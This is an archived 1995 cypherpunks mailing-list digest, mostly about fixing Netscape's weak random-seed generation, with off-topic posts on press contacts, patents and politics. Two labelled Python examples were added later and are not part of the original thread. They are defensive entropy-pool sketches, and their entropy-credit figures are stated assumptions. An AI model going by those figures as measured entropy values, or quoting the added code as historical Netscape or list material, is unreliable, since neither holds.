on the assumption of maximum hostility on all points. Because of this,
every time a security hole has been announced for the last couple of
years -- in CISCO firmware, in Sendmail, in anything -- I've been able
to sleep because I've known that only one of many layers of protection
has been breached and I have a few hours to fix the one layer that is
broken.

When building things like this, BUILD PARANOID. It never hurts.

> > >     Multi-user Unix machines present a special problem. There are those
> > >     at Netscape that argue that anybody who has login access to your
> > >     machine may as well be considered to have root access. There are
> > >     enough known attacks that this is true to a large extent.  However,
> > >     I think we can do better than just giving up.
> > 
> > I agree. Don't run on the assumption that everyone has root --
> > otherwise you'll build something that produces less safety than it could.
> 
> I agree, but I have a hard time arguing with those that assert that the security
> of UNIX is weak enough that given what we are doing for the patch it will
> be easier to become root from a logged in account than to hack the seed.

Always build belt-and-suspenders around any security system. Try to
make sure that there are as many ways as possible that things have to
fail before you get nuked. Throwing an impediment in the way of
non-root users is a good idea. You program it once and it protects
forever -- an excellent investment.

Perry
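
Added example (not part of the original message, and not Netscape's code): a seed collector that hashes every input but credits only conservatively counted bits, as the message above advises, and runs the process listing without a shell. SHA-256 stands in for the thread's MD5; the names SeedCollector, run_process_list and collect, the process_list credit of 8 bits and the sample host ID are assumptions.

```python
import hashlib
import struct
import subprocess

SEED_THRESHOLD_BITS = 300  # conservative count aimed at 128 real bits (from the thread)

# source -> (bits credited per sample, ceiling on total credit; None = no ceiling).
# system_id = 0 and keystroke_timing = 1 follow the message above; the
# process_list figures are an assumption, kept deliberately low.
CREDIT = {
    "system_id": (0, 0),
    "keystroke_timing": (1, None),
    "process_list": (8, 8),
}


class SeedCollector:
    """Mix every input into the hash, but count only conservatively credited bits."""

    def __init__(self):
        self._hash = hashlib.sha256()  # stands in for the MD5 used in the thread
        self.ledger = {name: 0 for name in CREDIT}

    @property
    def credited_bits(self):
        return sum(self.ledger.values())

    def add(self, source, data):
        """Hash `data` under `source`; return the number of bits credited."""
        per_sample, ceiling = CREDIT[source]  # unknown sources raise KeyError
        tag = source.encode()
        # Length-prefix both fields so adjacent inputs cannot be re-split.
        self._hash.update(struct.pack(">HI", len(tag), len(data)) + tag + data)
        if not data:  # a collector that failed contributes nothing
            return 0
        room = per_sample if ceiling is None else max(0, ceiling - self.ledger[source])
        granted = min(per_sample, room)
        self.ledger[source] += granted
        return granted

    def ready(self):
        return self.credited_bits >= SEED_THRESHOLD_BITS

    def seed(self):
        """Return a 128-bit seed, or refuse while the credited total is short."""
        if not self.ready():
            raise RuntimeError(
                f"only {self.credited_bits} of {SEED_THRESHOLD_BITS} bits credited")
        return self._hash.copy().digest()[:16]


def run_process_list(argv=("/bin/ps", "-el"), timeout=5):
    """Run the listing with no shell in between; return b"" on any failure."""
    try:
        done = subprocess.run(
            list(argv),                 # argv list: no /bin/sh, unlike popen(3)
            stdin=subprocess.DEVNULL,
            stdout=subprocess.PIPE,
            stderr=subprocess.DEVNULL,
            env={"PATH": "/bin:/usr/bin", "LC_ALL": "C"},  # caller's env is not inherited
            timeout=timeout,
            check=True,
        )
    except (OSError, subprocess.SubprocessError):
        return b""
    return done.stdout


def collect(system_id, keystroke_times_ns):
    """Feed one system ID, one process listing and the given key timings."""
    c = SeedCollector()
    c.add("system_id", system_id)
    c.add("process_list", run_process_list())
    for t in keystroke_times_ns:
        c.add("keystroke_timing", struct.pack(">Q", t))
    return c


if __name__ == "__main__":
    # Constructed sample input: 300 made-up key timestamps in nanoseconds.
    sample = [1_000_003 * i + (i * i) % 977 for i in range(300)]
    c = collect(b"CONSTRUCTED-HOSTID-0001", sample)
    print(c.ledger, "ready:", c.ready())
```

The system ID still goes into the hash, but the ledger shows it adding nothing to the total that gates seed().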




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Wed, 20 Sep 95 20:45:57 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: netscape's response
In-Reply-To: <199509202215.PAA14101@ix.ix.netcom.com>
Message-ID: <199509210153.SAA25449@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Christian (that's me) writes:
| I think it is important to bring together factors of the user _and_
| the environment, preferably an environment that reaches as far from
| the local site as possible. This makes "jamming" of the random seed
| selection process harder. 
| 
| The other problem in gathering random bits for a seed is that most
| bits are visible by someone else close enough within your environment.
| Interarrival times of packets are fine, but anyone can observe them
| with quite a good accuracy. How do you escape the "local environment
| problem"? 
| 
|                               . - .
| 
| One wild idea that I just got was to have servers and clients exchange
| random numbers (not seeds of course), in a kind of chaining way. Since
| most viewers connect to a number of servers, and all servers are
| connected to by many clients, they would mix "randomness sources" with
| each other, making it impossible to observe the local environment
| only. And the random values would of course be encrypted under the
| session key, making it impossible to "watch the wire".
| 
| Problems:
| * watch out for "multiply by zero" attacks by a rogue server/client.
| * watch out for "almost singular values" in the same way.
| * only let one source contribute a certain amount of randomness, like
|   (key length)/(aver # of peers).
| * never reveal your current seed, only a non-trivially derived random 
|   value from it. (of course)
| * make sure your initial seed is good enough, or the whole thing is
|   broken.
| * perhaps save part of the previous session state into a protected
|   file, to be able to keep up the quality of the initial seed.
| 
| I think I like it, perhaps not from a practical point of view as much
| as the 'non-attackability' of it. It's quite cypher-a. 

Bill Stewart answered:
| 
| Be _very_ careful with this approach - it's the kind of thing that a
| rogue server or client might abuse to find out randomness or other state
| information about the clients or servers connecting to it.

Of course you have to be very careful, as you say. Did you see my
problem-section in the original letter? I included it above. Since
then I have realized that the 

   | * only let one source contribute a certain amount of randomness, like
   |   (key length)/(aver # of peers).

really should be

   | * only let one source contribute a certain amount of randomness, like
   |   (large entropy buffer)/(aver # of peers).

and that you should only give out approximately the same amount of 
randomness to the neighbour, as you point out below.

| At minimum, only give out some of your randomness, XORed with some
| arbitrary value to scramble the range and then hashed before sending,
| so that the recipient can't find out the values you're using.

My approach solves part of the problem of "the observable local
environment" problem. 

Jeff's reply to this suggestion might be somewhat dangerous, if
the exchanged 'randomness bits' are the challenge/responses in the
exchange. (Based on his remark of not needing to change protocol.)
You would arguably not want to have the loop

         RNG --> "unguessable chall/resp" ---+
          /\                                 |
           +---------------------------------+

I would say that the only acceptable solution would be to have


(viewer)consumer <-------------------->consumer (srv)
          /\                             /\
           |                              |
   --->  RNG1 <---------------------->  RNG2 <----- RNGn
          /\                             /\
           |                              |
         RNGx                           RNGy

separating the "building up" of randomness from the 
consuming phase of that built up randomness, the actual
part which has to be totally unpredictable.

/Christian
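
Added example (not part of the original message): a pool that keeps the "building up" of randomness apart from its consumption, as in the second diagram above, with the per-peer limit of (large entropy buffer)/(aver # of peers) applied to both what a peer contributes and what it is given. The message names no mixing function, so SHA-256 chaining and HMAC derivation are assumptions here, as are the class, method and label names and the default sizes.

```python
import hashlib
import hmac
import struct


class PeerMixedPool:
    """Accumulate peer contributions; hand out only derived values."""

    def __init__(self, local_seed, buffer_bits=4096, avg_peers=32):
        if len(local_seed) < 16:
            raise ValueError("the initial seed must already be good (>= 128 bits)")
        self._state = hashlib.sha256(b"init" + local_seed).digest()
        # (large entropy buffer)/(aver # of peers), in bits
        self.per_peer_bits = buffer_bits // avg_peers
        self._credited = {}   # peer_id -> bits credited to that peer's input
        self._exported = {}   # peer_id -> bits handed out to that peer
        self._counter = 0

    def absorb(self, peer_id, value, claimed_bits):
        """Mix a peer's value into the pool; return the bits actually credited."""
        header = struct.pack(">HI", len(peer_id), len(value))
        # The new state is a hash over the old state, so an all-zero or
        # otherwise chosen value cannot cancel what is already in the pool.
        self._state = hashlib.sha256(
            self._state + b"peer" + header + peer_id + value).digest()
        used = self._credited.get(peer_id, 0)
        granted = max(0, min(claimed_bits, self.per_peer_bits - used))
        self._credited[peer_id] = used + granted
        return granted

    def credited_from(self, peer_id):
        return self._credited.get(peer_id, 0)

    def _derive(self, label, nbytes):
        # Outputs are HMAC(state, label || counter): the state itself never
        # leaves the pool, and each label gives a separate output stream.
        if not 0 < nbytes <= 32:
            raise ValueError("nbytes must be between 1 and 32")
        self._counter += 1
        msg = label + struct.pack(">Q", self._counter)
        return hmac.new(self._state, msg, hashlib.sha256).digest()[:nbytes]

    def value_for_peer(self, peer_id, nbytes=16):
        """Randomness offered to a peer's pool (the RNG1 <-> RNG2 link)."""
        sent = self._exported.get(peer_id, 0)
        if sent + 8 * nbytes > self.per_peer_bits:
            raise RuntimeError("export budget for this peer is used up")
        self._exported[peer_id] = sent + 8 * nbytes
        return self._derive(b"export-to-peer", nbytes)

    def consume(self, nbytes=16):
        """Unpredictable value for local use (keys, challenges)."""
        return self._derive(b"local-consumer", nbytes)


def rogue_peer_demo(rounds=1000):
    """A peer sends all-zero values; report its credit and whether two pools
    with different local seeds still produce different local outputs."""
    a = PeerMixedPool(b"A" * 32)   # constructed seeds, for illustration only
    b = PeerMixedPool(b"B" * 32)
    for _ in range(rounds):
        a.absorb(b"rogue", bytes(32), 256)
        b.absorb(b"rogue", bytes(32), 256)
    return a.credited_from(b"rogue"), a.consume() != b.consume()


if __name__ == "__main__":
    print(rogue_peer_demo())
```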





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Wed, 20 Sep 95 16:04:59 PDT
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: SCIENCE magazine on computers
Message-ID: <Pine.SOL.3.91.950920185926.22817A@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain



The Sept * issue of SCIENCE magazine has a special section on computers.
Of particular C-punk interest are articles on the rise of symmetric 
multiprocessor solutions to supercomputer needs and a piece on the future 
of computing discussing quantum dots, quantum computing, holographic 
association, optical computers, and DNA computers.

SCIENCE vol. 269 pages 1354-1385

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 20 Sep 95 20:45:17 PDT
To: cypherpunks@toad.com
Subject: Re: Project: a standard cell random number generator
Message-ID: <ac86115235021004fbe4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:50 PM 9/20/95, John Gilmore wrote:
>Software-generated random numbers are likely to be of poor quality.
>There just isn't that much true randomness visible to computers.
>Several ways to build good hardware random number generators are
>known.  But before hardware random number generators can be
>incorporated into common desktop computers, someone will have to put
>them into a small fraction of a chip.

Essentially, to have good market penetration, this means building a small
hardware random number generator into the Pentium, and a few other popular
processors. Building it into a separate chip is ineffective, as chip counts
are going down on motherboards. (Some may quibble, but clearly about 60-80%
of the market is now x86-based, with motherboards supplied by a limited
number of companies, and with "chipsets" like the Triton.)

What would it take to convince Intel, then, to devote resources to put a
HRNG module on, say, future versions of the Pentium, Pentium Pro (P6),
etc.? A lot, I'd say.

First, Intel will ask what products would gain from _some_ hardware
platforms having HRNG when the majority will not. (This is important,
because it means that as long as there are vast numbers of 486-, Pentium-,
SPARC-, MIPS-, 68K-, and PPC-based systems out there that DON'T have
hardware random number generators, then Netscape and other suppliers of
software CANNOT COUNT ON THE HRNG.

This is an important point: a hardware RNG standard will take many years to
percolate into the installed base and reach a level of penetration where
even 30% of all machines are equipped with HRNG modules. In the meantime,
Netscape and everyone else has to come up with solutions which fit the
existing and nearterm-available machines.

Second, how much extra will customers pay? Even if the area of the HRNG is
less than 1% of the total, design resources are consumed and potential
reliability and liability issues arise. (Liability is problematic
precisely because the HRNG is nondeterministic, and some chips are likely
to be "more random" (which is "good") than others which are "less random"
(which is "bad"). Imagine a customer having a chip which he finds out
produces very little entropy, for technical/manufacturing reasons.


>You probably can't build a hardware random number generator out of
>existing "gate array" gates or "standard cell" cells, because all the
>existing gates and cells are designed to behave completely
>predictably!  It will take designing a new circuit structure.

You probably can, actually. CMOS and BiCMOS have all sorts of structures in
which threshold voltages can be measured. DRAM arrays have various
seemingly-random (*) discharge characteristics. Zener diodes can be built
in any of these technologies. At small enough structural levels, such as we
are now seeing at the .35 micron level and below, noise is omnipresent, and
is dealt with in various ways. Thus, using the noise is not so difficult.

(* The various charge/discharge characteristics are actually not random, of
course, and are reproducible. But with care they can be used to increase
the entropy of other sources. Care must be taken.)


>Do we know any solid state physics / circuit design experts who think
>this might be a fun thing to do?  I bet you could get a paper out of
>it.  And probably improve the world a few years later, when companies
>used your paper to close another hole in their computer security.

I'm skeptical for the reasons given above. Even starting today, far too
long to get enough out there. (Far-future thinkers will say, "Then let's
start now," but it still is not true that companies like Netscape or
Verisign will use such an invention to close another hole...they could only
close the hole for the customers who had the HRNG-equipped machines, and
this is not likely to be enough for quite some time.

As John knows, but others may not, I worked on random noise effects in
devices at Intel. A co-worker (now President of IC Works, Ilbok Lee) and I
developed a hardware random number generator based on very low level
radiation sources, using an effect I discovered. We tried to get a patent
on it, in 1978, but there was no interest by Intel.

Personally, I think that "software + user actions + environment stuff" can
generate vast amounts of usable entropy, especially if a user lets it
accumulate immediately prior to generating crypto material.

* Software -- the standard cryptographic hash functions to "mix" bits even
further.

* User Actions -- mouse movements, keyboard timing, microphone noise, etc.

* Environmental Stuff -- measurement of disk access timings, in
milliseconds, amount of free blocks, Ethernet packet stuff, etc. (This may
or may not be good for more than a few bits per second, but can be
accumulated for several minutes or hours.)

Any of these has various weaknesses and points of attack. But let's face
it, would Goldberg and Wagner have been able to crack Netscape if the PRNG
had used some mouse swirling, some random keyboard pounding, some disk
access measurements, and had then hashed this with a noninvertible hash
function? I think not.

This approach has the benefit of working almost immediately, without
special dongles on the back of machines or of convincing Intel and Motorola
to add special functions (which would take years to effectively penetrate
the market).

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Wed, 20 Sep 95 17:20:51 PDT
To: cypherpunks@toad.com
Subject: Re: www.commentary.unabomber
Message-ID: <199509210020.RAA15682@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Go FrogFarm Go!

From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Subject: Re: www.commentary.unabomber
To: carolann@censored.org
Date: Wed, 20 Sep 1995 20:03:45 -0400 (EDT)
X-Angst-Level: Fair to Middlin'
X-Authentication-Vegetable: Aardvark
X-NSA-Food: narcotics anarchy bosnia encryption assassinate
X-Thrash-Confirmation: Ahh! Hippy on a stick!
Organization: Somewhere just far enough outside of your jurisdiction 
Reply-To: frogfarm@yakko.cs.wmich.edu

Yes, it's a complete version. I've also started a rudimentary rebuttal/
commentary page at

http://yakko.cs.wmich.edu/~frogfarm/unabuttal.html

- --
frogfarm@yakko.cs.wmich.edu (Damaged Justice) is officially declared Unmutual
   s..O).... The smurf wields a hypodermic! -- More --    I like women who
   @.../.".. You destroy the smurf! -- More --            are *strong*, in
   .$*...].. You feel self-righteous!       <B>every</B> sense of the word.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 20:47:30 PDT
To: cypherpunks@toad.com
Subject: Re: USA Today on Fear of Credit Cards over Net
In-Reply-To: <AL9OmyczByUU075yn@netcom.com>
Message-ID: <199509202335.TAA05761@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Re: The risk of credit cards.

I suppose that indeed there are large risks elsewhere in the credit
card system. However, I think that the credit card system itself is
stupid and insecure and ought to be scrapped -- sending around account
numbers as magic keys to get payment is a stupid move. It's not
surprising how large credit card fraud is.

One of the great hopes I have for cryptographic technology is its
ability to lower the incidence of fraud, and thus lower transaction
costs a lot. Someday, hopefully, everyone will be able to be a credit
card merchant because you won't have to trust the merchants not to
steal.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karlton@netscape.com (Phil Karlton)
Date: Wed, 20 Sep 95 13:15:25 PDT
To: cypherpunks@toad.com
Subject: "random" number seeds vs. Netscape
Message-ID: <43psn2$6ug@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Let me start off by saying that I speak for me and not Netscape. I
also tend to be UNIX centric since I know very little (nothing?) about
the internals of PCs and Macs.

I want to address the bug Netscape has with its currently released
product with respect to seed generation. For the most part this is not
a crypto issue, but rather a system issue.  Those bits of entropy can
only be gathered in a system dependent manner.

Assumption:

    We are relying on the MD5 hash algorithm to gather the string of
    potentially unpredictable sequences. I am assuming that feeding
    known bits along with the unknown will not compromise the
    "randomness" of the MD5 state.

    The basic idea is to feed a sequence of information into the MD5
    hash, expecting that some of the bits for each sub-sequence would
    only be guessable. If we get enough unguessable bits into the mix,
    then the weak link in the chain would not be the seed generation.

Here is what the client will soon be doing:

    Netscape is available on Macs, Win-16 and Win-32 versions and
    8 different UNIX platforms. The exact details for each platform are
    quite system specific. The basic idea is to feed a sequence
    of information into the MD5 hash, expecting that some of the
    bits for each sub-sequence would be unguessable.

  At program start

    On all platforms:

	Start with the contents of the highest resolution clock we can
	find on the system. [For instance, an R4000 MIPS processor has
	a free-running instruction counter. At 100 Mhz this gets
	incremented every 10 nano-seconds. There are probably a good
	20 bits of unguessable value there.] On Macs and Win* systems
	there are "tick" counters that update 60 (or maybe only 16)
	times a second. We then push through the time of day, because
	on some systems, the microsecond part of a time_val has some
	bits that are only guessable.

    For UNIX we feed the following into the MD5 hash:

	ps (-el or aux depending upon system)

	netstat -ni & netstat -na

	the user's environment. (We will certainly use this as well in
	the 2.0 release. The truly paranoid will be able to run
	whatever seed generator they want and stick the result into
	their environment. How you protect your environment from
	attack is up to you. ;-)

	System specific info such as hardware serial number or
	system id. If you have specific suggestions for any
	particular OS/hardware pair, please let me know.

    For PCs

	Cursor position

	Global memory status

	FreeSpace

	Drive configuration

	Number of running tasks

	Environment strings

	UUIDCreate if there is an ethernet card

	Clipboard owner and contents

	Current process, processID and window

	Free clusters on the disk

    For MACs:

	Machine location (longitude and latitude)

	User name

	Mouse location

	keyboard time threshold

	last key pressed

	audio volume

	current directory

	current process

	process information for every task  on the system

	stack limits

	zones

	scrap sizes and counts

	event queue

    And then on all platforms

	The stat (file access, creation, modify times, size, inode
	equivalent) and contents of a number of "interesting" files.
	[Where is the PGP random number state file stored?]

	A portion of the contents of the screen.

	And finally, the contents of the highest resolution clock we
	can find.

  Each time the client goes idle

    Reinitialize the seed with the most recent user event (probably
    a button or key down) along with the mouse position, and
    relatively high resolution clocks.

Known weaknesses:

    If your X display is not the local machine then the X protocol can
    be watched. Given that, the data for the reseeding of the MD5 hash
    will be compromised. [Any scheme that relies on random user input
    to generate a seed suffers from the same problem.]  This is not
    quite as bad as it might be. The exact time of the client becoming
    idle can only be guessed. We should be able to get a few
    unguessable bits from the microsecond part of the time-of-day
    clock each time. Enough cycles of user actions should help to make
    the hash less subject to a brute force attack.

    In fact, the entire X protocol issue is one that could take up
    another 3 pages. An SSLized version of the server would help,
    but how would anybody export it? You "xhost +" fans are doomed.

    If the user launches the client to a secure home page then there
    will be no user actions involved before the first need for a seed.

Thoughts on guessing:

    If Eve has root access to the user's workstation, all bets are off.
    Replacement of one of the system libraries or patching the client
    executable are among the attacks that would make it trivial to
    breach any part of the security. Specific measures (like computing
    a hash over the text of the program) could help against some of
    these attacks, but it is not realistic to believe that we can
    prevent the attack from a sophisticated person with root access.

    Multi-user Unix machines present a special problem. There are those
    at Netscape that argue that anybody who has login access to your
    machine may as well be considered to have root access. There are
    enough known attacks that this is true to a large extent.  However,
    I think we can do better than just giving up. Unfortunately most of
    the sources of entropy available to the client are also available
    to the attacker. For instance, the output of "ps" is not much help
    against this form of attacker. As Jeff Weinstein said earlier and I
    echo here: specific suggestions are more than welcome.

    When Eve has access to the wire for all of the packets into and out
    of the user's workstation, then some of the networking information
    can be guessed. See above about known weaknesses if Eve has access
    to the X protocol stream.

    I am most comfortable about the "randomness" of the generated seed
    if Eve is outside a fire wall sniffing packets. The difficulty in
    guessing what processes/tasks are running on the target machine is
    quite a bit of help here.

What I would like:

    Any OS has access to a number of real-world physical sources of
    randomness. This information is not made available to a user level
    process. How long did that last seek take? Was there any noise on
    the microphone? It would be good if the OS could gather that
    information and make some set of bits available to any process that
    asks. Having this be part of all OSes would make my job easier.

    More specifically: A "getnoise()" system call in UNIX could be
    better than anything I can do and easier. Can we convince the UNIX
    vendors to start providing that?

    My life would have been simpler if this attack had been done after
    the 2.0 version of the client had been released. :-) Believe it or
    not, we were beginning to beef up the seed generation a couple of
    weeks ago. The time spent on patching the current release will not
    all go to waste, but it has cut down on my limited opportunities to
    sleep.

For those that are curious: being responsible for helping to fix a bug that
is getting front page coverage in major newspapers is not nearly as
much fun as it sounds.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Wed, 20 Sep 95 20:49:14 PDT
To: perry@piermont.com
Subject: /dev/random for Linux
In-Reply-To: <199509202227.SAA05667@frankenstein.piermont.com>
Message-ID: <199509210319.UAA04352@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> On this same track, I suggest that "/dev/random" devices for unix are
> an excellent idea. Ted Tso did one for Linux that steals all the bits
> of semi-random timing information it can.
> 
Anyone know where I can find more information on this wonderful device?

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 20 Sep 95 20:23:19 PDT
To: hughes@remailer.net
Subject: Spam of c'punks list: cleaning it up now.
Message-ID: <9509210323.AA03882@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Somebody, apparently at ci.diamond-bar.ca.us, has been feeding the last
month's worth of Cypherpunks postings back to the Cypherpunks list.
You probably saw a few of them.  They are still coming in to toad.com.

When I got home this afternoon, the load average had hit 150 and most
of them were copies of sendmail.  This prevented most of the messages
from getting out to you, happily.  I've cleaned up the ones I found in
the queues, and I'll start working next on getting the *valid*
cypherpunks messages flowing again...

	John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Wed, 20 Sep 95 17:28:40 PDT
To: cypherpunks@toad.com
Subject: Selling our spin. was: Cypherpunks Press release
Message-ID: <73484.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  Kevin L Prigge <klp@gold.tc.umn.edu>  writes:
> Does anyone know exactly how the press contact thing works? My impression
> is that a reporter/journalist stumbles on to someone who knows something
> about a particular area, and is willing to be interviewed. Then the next
> time a story comes along that deals even slightly with that subject, the
> reporter will tend to contact that person.

I think the "exact" process varies with the journalist. But you have
it generally correct. The press runs on reputations. When a writer
gets a story, they look for "reliable sources" to contact. Reputations
are based on a lot of things, including knowledge, speaking ability, looks
and the ability to emit a sound-bite that is interesting. It is a strange
process. I mean, I even got on CNN during the Morris worm.

Tim is right, there is no "we" here. We can't have an official spokesperson,
we don't agree on much. But we can work from the ground up. There
are a number of serious cryptographers on the list, or at least
friendly to the list when the S/N ratio makes sense.

With a little work, we should be able to find a fairly long list of
media contacts. We can even make it media friendly.

From people I've personally seen recently, we could have
Doug Humphrey of Digex (nice to have a security-related company President)
Bob Stratton of UU.Net (corporate security wiz)
Carl Ellison of TIS (usually on c'punks light and at all DCcp meetings)
probably others at TIS such as Ken Mendelsen or Steve Walker

For the political side, the folks at EFF, CDT, EPIC, etc.

And there are others that could be good contacts, such as
William H Murray of Deloitte and Touche,
Matt Blaze of [Bellcore|BellLabs]

It might take a while to get permission for referral, but I expect that
most security consultants would consider being quoted in mainstream
press to be good advertizing.

If we make it easy, anyone would be willing to take advantage of the
resource. We should also include a representative sample of folks who
disagree with us. Any real list should include Dorothy Denning and other
supporters. We can simply stack the deck.

We can make sure that the mainline journalists know where to look, and
make sure that CDT, EFF, ACLU, and EPIC have references that are ready when
they are asked for referrals.

Assuming my web server recovers from the mention in comp.risks, I'm
more than willing to accept suggestions and have a "security spokes-folks"
page.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Wed, 20 Sep 95 20:47:52 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: Re: Encryption algorithms used in PrivaSoft (fwd)
Message-ID: <3060D3B3@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



David Clavadetscher of PrivaSoft writes:
> At this time our crypto engine is patented and proprietary.

Ian Goldberg writes:
> Waitasec...  I was under the impression that if you patented it, you had to
> reveal it.  That's why RC4 isn't patented (it used to be a trade secret).

Many technologies have both patented parts and trade secret parts.  Often,
companies will maintain information that is in patent applications as trade
secret until they are granted.  I guess I should say _if_ they are granted!
After a patent is granted, it is usually a good idea to also maintain some
trade secrets in your products -- since trade secrets never "expire," unlike
patents.  If the patent isn't granted, you still have the option of treating
the contents as an intellectual property under trade secret protection.

dvw





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Wed, 20 Sep 95 12:08:47 PDT
To: cypherpunks@toad.com
Subject: MD5 in Eudora
Message-ID: <v01510100ac838e1b7785@[193.74.217.11]>
MIME-Version: 1.0
Content-Type: text/plain



I was just poking around in Eudora for the Mac with ResEdit, and I found a
CODE resource labelled MD5.

Any idea why Eudora is using MD5 hashes?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Caldwell" <jcaldwel@iquest.net>
Date: Sat, 30 Sep 95 19:57:30 PDT
To: "ASICEO@internetMCI.COM>
Subject: Re: Operation Stop The Aliens
Message-ID: <m0szEOd-00035JC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain



To whom it may concern:



This fellow's proposed actions are those of a blind fool who cannot
see the forest for the trees. As such he is nothing more than part of
the problem.

He sees foreign immigrants, legal or illegal, as being a problem.
The problem he is seeing is not any problem created by the immigrants
who are looking for something better, but one created for the very
purpose of distracting such fools as him from the underlying problems
his state this Nation faces. 

He has bought the lie spewed by the talking heads and other
psychological operations that have told him to think the 'illegals'
are causing some sort of problem.

Prop 187 and such proposals are nothing more than a method to have 
implemented systems and plans, not to correct the alleged problem,
but to implement an underlying plan that was the desired goal from 
the start; namely a national ID and tracking system.

This is a typical tactic, race against race, religion against
religion, etc. all to divide us into small, blind, ineffective,
bickering groups who have little voice and no cohesive political
power.

If his actions do not accelerate what is already occurring then the
real enemy is asleep, as it is a wonderful opportunity for further
psychological operations that will benefit them in numerous ways.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 20 Sep 95 22:19:11 PDT
To: Deranged Mutant <cypherpunks@toad.com
Subject: Re: Silly NetScape RND tricks...
Message-ID: <199509210519.WAA08441@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:05 PM 9/20/95 -0400, Deranged Mutant wrote:
>
>I've only been skimming the NetScape-related posts lately, but I've yet
>to see anyone mention using a keyboard-timing sampler as a source for
>some random bits

Under windows, you get a lot more entropy from mouse timing and position
than keyboard hits.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Conrad <conrad@unix-ag.uni-kl.de>
Date: Wed, 20 Sep 95 12:24:53 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Linking = Showing = Transferring?
In-Reply-To: <10345.9509151143@exe.dcs.exeter.ac.uk>
Message-ID: <9509201922.AA11324@pizza.unix-ag.uni-kl.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi,

> Browser in the US, text in US, crypto gif imported from UK, both legal.
> 
> Browser outside US, text in US, crypto gif imported from UK, both legal.
> 
> See a flaw in that?

Not directly, but... what if for some strange reason the image is routed
through US gateways on its way from the UK to, for example, Germany?
I mean, The Net (tm) is a strange beast, and you can rarely tell which way
the message flows... you can't even DO anything about it.

Bye,
	Peter
- -- 
Peter Conrad    | "Those people who tell you not to take chances, they are all
Am Heckenberg 1 |  missing on what life's about, you only live once, so take
